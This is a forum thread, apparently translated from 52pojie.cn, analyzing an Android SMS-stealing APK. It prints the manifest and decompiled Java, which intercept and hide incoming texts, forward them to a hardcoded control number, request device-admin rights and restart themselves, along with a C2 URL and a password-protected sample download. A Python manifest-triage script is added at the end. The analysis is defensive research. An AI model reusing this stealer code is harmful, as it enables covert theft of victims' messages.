吾爱破解 - 52pojie.cn
[Mobile Sample Analysis] Analysis of an APK file [unfinished]

Sp4ce posted on 2014-10-28 00:13
This post was last edited by 轩少 on 2014-10-28 22:42

An APK sample I caught in a QQ group yesterday. Looking at the permissions it asks for, they are all high-risk, so the possibility of privacy theft cannot be ruled out.
The file uses a nested-APK ("package in a package") install, meaning one APK carries another APK inside it. Here, cao.apk sits under 同城约炮相册\res\raw; once 同城约炮相册.apk is installed and run, it automatically installs cao.apk.
File information:
同城约炮相册.apk
CRC32: DFFE6DBE
MD5: 4F487D6D264F6FE9915D7FAEEC6327D0
SHA-1: ACC64922E63F978F689EC8E87A76CF6855CA6D00

cao.apk
CRC32: 00AF413F
MD5: 325666F55D02C48725E3EBC5613226F9
SHA-1: 4701C5857E6CA205DEEFF4F9A41B50D2CEEB5438


<?xml version="1.0" encoding="utf-8"?>
<manifest
        xmlns:android="http://schemas.android.com/apk/res/android"
        android:versionCode="2"
        android:versionName="2.0"
        package="sdgfdg.wtert.sdgsfgbxbcvdfh"
        >
        <uses-sdk
                android:minSdkVersion="8"
                android:targetSdkVersion="20"
                />
        <uses-permission android:name="android.permission.INTERNET" />                  <!-- network access -->
        <uses-permission android:name="android.permission.SEND_SMS" />                  <!-- send SMS -->
        <uses-permission android:name="android.permission.RECEIVE_SMS" />               <!-- receive SMS -->
        <uses-permission android:name="android.permission.READ_SMS" />                  <!-- read SMS -->
        <uses-permission android:name="android.permission.WRITE_SMS" />                 <!-- write SMS -->
        <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />    <!-- read/write files on external storage -->
        <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" /> <!-- kill the specified processes -->
        <application
                android:theme="@android:01030007"
                android:label="@7F060001"
                android:icon="@7F020000"
                android:debuggable="true"
                android:allowBackup="true"
                >
                <activity
                        android:label="@7F060001"
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MainActivity"
                        >
                        <intent-filter
                                >
                                <action
                                        android:name="android.intent.action.MAIN"
                                        >
                                </action>
                                <category
                                        android:name="android.intent.category.LAUNCHER"
                                        >
                                </category>
                        </intent-filter>
                </activity>
                <!-- runs MyServers1.class -->
                <service
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.MyServers1"
                        >
                </service>
                <!-- runs DevicesReceiver2.class; guarded by BIND_DEVICE_ADMIN, i.e. a device-administrator receiver
                     (label "请激活" means "please activate") -->
                <receiver
                        android:label="请激活"
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.DevicesReceiver2"
                        android:permission="android.permission.BIND_DEVICE_ADMIN"
                        android:description="@7F060003"
                        >
                        <meta-data
                                android:name="android.app.device_admin"
                                android:resource="@7F040000"
                                >
                        </meta-data>
                        <intent-filter
                                >
                                <!-- fired when device administrator is turned on -->
                                <action
                                        android:name="android.app.action.DEVICE_ADMIN_ENABLED"
                                        >
                                </action>
                        </intent-filter>
                </receiver>
                <!-- runs laixinxis.class -->
                <receiver
                        android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.laixinxis"
                        >
                        <intent-filter
                                android:priority="2147483647"
                                >
                                <!-- intercepts the system's incoming-SMS broadcast (the one behind the notification bar) -->
                                <action
                                        android:name="android.provider.Telephony.SMS_RECEIVED"
                                        >
                                </action>
                                <!-- hidden start? -->
                                <category
                                        android:name="android.intent.category.DEFAULT"
                                        >
                                </category>
                        </intent-filter>
                </receiver>
        </application>
</manifest>

Looking at the AndroidManifest.xml configuration, the program is granted a great many permissions, and high-risk ones at that, for example sending SMS, killing processes, intercepting broadcasts, and so on.
The DevicesReceiver2.class code is as follows:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.app.admin.DeviceAdminReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.res.Resources;
 
public class DevicesReceiver2 extends DeviceAdminReceiver
{
  ComponentName componentName;
  PackageManager packageManager;
 
  public void onDisabled(Context paramContext, Intent paramIntent)
  {
    super.onDisabled(paramContext, paramIntent);
  }
 
  public void onEnabled(Context paramContext, Intent paramIntent)
  {
    super.onEnabled(paramContext, paramIntent);
  }
 
  // Reports device-admin state changes to huanaidss2.controlphone through ApksUtil1.loadFaMsg.
  // The numeric arguments are string-resource ids resolved at runtime; shanxx below shows the
  // same first id being used as a class name for a DexClassLoader.
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_ENABLED"))
      ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099659));
    else if (paramIntent.getAction().equals("android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"))
      ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099660));
    super.onReceive(paramContext, paramIntent);
  }
}
It calls huanaidss2.controlphone, so let's look at huanaidss2.class next:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
public class huanaidss2
{
  public static final String baidu = "http://60.8.229.158:8002/sj.asp";
  public static String controlphone = "15021352759";
}

This gives controlphone = "15021352759", which means it will send SMS to 15021352759. I did a quick search on that phone number, heh heh...
[image: 1.jpg]
The shouxinxi.class code is as follows:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.content.Context;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.database.ContentObserver;
import android.net.Uri;
import android.os.Handler;
 
// ContentObserver on the SMS inbox: every change to content://sms/inbox re-runs Change().
public class shouxinxi extends ContentObserver
{
  public SharedPreferences abSharedPreferences = null;
  private Context context;
  public SharedPreferences.Editor editor;
  private Uri inbox = null;
  private String status;
 
  public shouxinxi(Context paramContext, Handler paramHandler)
  {
    super(paramHandler);
    this.context = paramContext;
    this.inbox = Uri.parse("content://sms/inbox");
    Change();
  }
 
  public void Change()
  {
    this.abSharedPreferences = this.context.getSharedPreferences("data", 0);
    this.status = this.abSharedPreferences.getString("isWorkServer", "0");
    // calls ApksUtil1.shanxx (which loads a class from a secondary dex) with huanaidss2.controlphone
    ApksUtil1.shanxx(this.context, this.context.getResources().getString(2131099666), this.context.getResources().getString(2131099669), huanaidss2.controlphone, this.status, this.inbox, this.abSharedPreferences);
  }
 
  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    this.inbox = Uri.parse("content://sms/inbox");
    Change();
  }
}

The laixinxis.class code is as follows:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.content.SharedPreferences;
import android.content.SharedPreferences.Editor;
import android.content.res.Resources;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;
 
public class laixinxis extends BroadcastReceiver
{
  public SharedPreferences abSharedPreferences = null;
  public SharedPreferences.Editor editor;
  private String messageStr;
  private int n;
  private String phoneStr;
  private shouxinxi shouxxba;
  private String status;
  private SmsMessage[] xinxi;
 
  // Handles the incoming-SMS broadcast. "isWorkServer" in the "data" preferences is the on/off
  // switch: while it is "1" every incoming message is forwarded to huanaidss2.controlphone, and a
  // message containing "open" or "close" flips the switch.
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    this.abSharedPreferences = paramContext.getSharedPreferences("data", 0);
    this.status = this.abSharedPreferences.getString("isWorkServer", "0");
    Log.i("action", paramIntent.getAction());
    paramContext.getSharedPreferences("config", 0);
    // string 2131099655 is presumably the SMS_RECEIVED action; MyServers1 registers the same filter
    if (!paramIntent.getAction().equals(paramContext.getResources().getString(2131099655)))
      return;
    Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
    this.xinxi = new SmsMessage[arrayOfObject.length];
    for (this.n = 0; this.n < arrayOfObject.length; this.n = 1 + this.n)
    {
      this.xinxi[this.n] = SmsMessage.createFromPdu((byte[])arrayOfObject[this.n]);
      this.phoneStr = this.xinxi[this.n].getOriginatingAddress();
      this.messageStr = this.xinxi[this.n].getMessageBody();
      if (this.status.equals("1"))
      {
        // forwarding is on: pinbi (屏蔽, "block") is handed the receiver itself, presumably to
        // stop the message reaching the user, then the body is checked for commands
        ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
        if (this.messageStr.contains("close"))
        {
          ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099653));
          this.editor = this.abSharedPreferences.edit();
          this.editor.putString("isWorkServer", "0");
          this.editor.commit();
        }
        else if (this.messageStr.contains("open"))
        {
          ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
          this.editor = this.abSharedPreferences.edit();
          this.editor.putString("isWorkServer", "1");
          this.editor.commit();
          this.shouxxba = new shouxinxi(paramContext, null);
          paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
        }
        else
        {
          // ordinary message: sender and body are relayed to the control number
          ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, this.phoneStr + "<" + this.messageStr);
        }
      }
      else if (this.messageStr.contains("open"))
      {
        // forwarding is off: only an "open" command is acted on
        ApksUtil1.pinbi(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099668), this);
        ApksUtil1.loadFaMsg(paramContext, paramContext.getResources().getString(2131099666), paramContext.getResources().getString(2131099667), huanaidss2.controlphone, paramContext.getResources().getString(2131099654));
        this.editor = this.abSharedPreferences.edit();
        this.editor.putString("isWorkServer", "1");
        this.editor.commit();
        this.shouxxba = new shouxinxi(paramContext, null);
        paramContext.getContentResolver().registerContentObserver(MyServers1.xxdizhi, true, this.shouxxba);
      }
    }
  }
 
  void pingbi(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver)
  {
    ApksUtil1.pinbi(paramContext, paramString1, paramString2, paramBroadcastReceiver);
  }
 
  public native void pingbiJNI(Context paramContext, String paramString1, String paramString2, BroadcastReceiver paramBroadcastReceiver);
}

The shanxx code that gets called is as follows:
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import java.io.File;
import java.lang.reflect.Method;
import android.content.Context;
import android.content.SharedPreferences;
import android.net.Uri;
import dalvik.system.DexClassLoader;
 
public class ApksUtil1
{
  // Loads class paramString1 from a secondary dex file (its path comes from AbFilesUtil1.path and
  // AbFilesUtil1.Filepath, defined elsewhere in the sample) and invokes method paramString2 on it
  // by reflection, so the code that actually runs is not in the main classes.dex.
  public static void shanxx(Context paramContext, String paramString1, String paramString2, String paramString3, String paramString4, Uri paramUri, SharedPreferences paramSharedPreferences)
  {
    File localFile = paramContext.getDir("dex", 0);
    DexClassLoader localDexClassLoader = new DexClassLoader(AbFilesUtil1.path.getAbsolutePath() + AbFilesUtil1.Filepath, localFile.getAbsolutePath(), null, paramContext.getClassLoader());
    try
    {
      Class localClass = localDexClassLoader.loadClass(paramString1);
      Object localObject = localClass.newInstance();
      Method localMethod = localClass.getMethod(paramString2, new Class[] { Context.class, String.class, String.class, Uri.class, SharedPreferences.class });
      localMethod.setAccessible(true);
      localMethod.invoke(localObject, new Object[] { paramContext, paramString3, paramString4, paramUri, paramSharedPreferences });
      return;
    }
    catch (Exception localException)
    {
      localException.printStackTrace();
    }
  }
}
The MyServers1.class code is as follows (it calls the classes above):
package sdgfdg.wtert.sdgsfgbxbcvdfh;
 
import android.app.Service;
import android.content.ContentResolver;
import android.content.Intent;
import android.content.IntentFilter;
import android.content.SharedPreferences;
import android.content.res.Resources;
import android.net.Uri;
import android.os.IBinder;
 
public class MyServers1 extends Service
{
  public static final Uri xxdizhi = Uri.parse("content://sms/");  // the whole SMS provider, not only the inbox
  public SharedPreferences abSharedPreferences = null;
  private laixinxis xinxilai;
  private shouxinxi xxshou;
 
  public IBinder onBind(Intent paramIntent)
  {
    return null;
  }
 
  public void onCreate()
  {
    super.onCreate();
    this.abSharedPreferences = getSharedPreferences("data", 0);
    // watch every change to the SMS database
    this.xxshou = new shouxinxi(this, null);
    getContentResolver().registerContentObserver(xxdizhi, true, this.xxshou);
    // register laixinxis a second time at runtime, again at maximum priority,
    // on top of the manifest declaration
    IntentFilter localIntentFilter = new IntentFilter();
    localIntentFilter.addAction(getResources().getString(2131099655));
    localIntentFilter.setPriority(2147483647);
    this.xinxilai = new laixinxis();
    registerReceiver(this.xinxilai, localIntentFilter, getResources().getString(2131099655), null);
  }
 
  public void onDestroy()
  {
    super.onDestroy();
    stopForeground(true);
    unregisterReceiver(this.xinxilai);
    getContentResolver().unregisterContentObserver(this.xxshou);
    // restarts itself whenever it is stopped
    Intent localIntent = new Intent();
    localIntent.setClass(this, MyServers1.class);
    startService(localIntent);
  }
}

My skills are limited, so this is as far as I can get. The sample is below; anyone capable, carry on... there are too many function calls. Password: 52pojie
同城约炮相册.rar (52.07 KB, downloads: 100)
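As an added example, not part of the original post or the sample: a Python triage script that parses a decoded AndroidManifest.xml and pulls out the traits the manifest above shows together (SMS permissions, a BIND_DEVICE_ADMIN receiver, an SMS_RECEIVED receiver at priority 2147483647, debuggable=true). The embedded manifest is a constructed, trimmed copy of the one in the post; the class names and package are the sample's, everything else is assumed.

```python
# Added example (not from the post): triage a decoded AndroidManifest.xml for the
# traits seen in this sample. SAMPLE_MANIFEST is a constructed, trimmed copy of it.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_PERMS = {"android.permission.SEND_SMS", "android.permission.RECEIVE_SMS",
             "android.permission.READ_SMS", "android.permission.WRITE_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

def android_attr(elem, name):  # read an android:-namespaced attribute such as android:name
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def triage_manifest(xml_text):
    """Collect the manifest traits that together mark an SMS-relaying app."""
    root = ET.fromstring(xml_text)
    perms = {android_attr(p, "name") for p in root.iter("uses-permission")}
    app = root.find("application")
    report = {"sms_permissions": sorted(perms & SMS_PERMS),
              "debuggable": app is not None and android_attr(app, "debuggable") == "true",
              "device_admin_receivers": [],  # hard to uninstall once the user activates one
              "sms_receivers": []}           # (receiver class, intent-filter priority)
    for recv in root.iter("receiver"):
        name = android_attr(recv, "name")
        if android_attr(recv, "permission") == DEVICE_ADMIN:
            report["device_admin_receivers"].append(name)
        for filt in recv.iter("intent-filter"):
            actions = {android_attr(a, "name") for a in filt.iter("action")}
            if SMS_RECEIVED in actions:
                # ordered broadcast: the highest priority receiver sees the message first,
                # so Integer.MAX_VALUE (2147483647) is a red flag on its own
                report["sms_receivers"].append((name, int(android_attr(filt, "priority") or 0)))
    return report

def is_suspicious(report):
    """RECEIVE_SMS and SEND_SMS together with a top-priority SMS_RECEIVED receiver."""
    relay = {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= set(report["sms_permissions"])
    return relay and any(prio >= 2**31 - 1 for _, prio in report["sms_receivers"])

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="sdgfdg.wtert.sdgsfgbxbcvdfh">
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <application android:debuggable="true">
    <receiver android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.DevicesReceiver2"
        android:permission="android.permission.BIND_DEVICE_ADMIN"/>
    <receiver android:name="sdgfdg.wtert.sdgsfgbxbcvdfh.laixinxis">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/></intent-filter>
    </receiver>
  </application>
</manifest>"""
```

Run `triage_manifest()` on the `AndroidManifest.xml` that apktool writes out; the report is plain data, so it drops into whatever triage notes or rule set you keep.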

Ratings (2 participants, enthusiasm points +2):
sonyiii +1: How did you look up the phone number? What method did you use?
zjxpioneer +1: Thanks!


Hmily posted on 2014-11-21 19:25
Nice, starting to do Android analysis? @willJ
rockymax posted on 2014-12-13 22:08
B6B6B6 posted on 2014-11-21 23:49 from mobile
爱不灭 posted on 2014-12-20 10:14 from mobile
Let me study this
OP | Sp4ce posted on 2015-2-9 02:19
I'll take another look in a few days; no time lately, tired as a dog
武川烁 posted on 2015-2-10 09:51 from mobile
That file name of yours...
星期日 posted on 2015-3-20 23:49
I'm studying this software too! Why hasn't the OP updated for so long?
15732164757 posted on 2015-8-6 08:23 from mobile
I know about this one
蚊子169 posted on 2016-4-14 17:15
Did you finish it?